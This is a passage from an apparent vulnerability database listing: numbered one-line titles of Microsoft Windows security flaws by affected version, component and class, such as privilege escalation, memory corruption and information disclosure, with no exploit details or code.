SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up 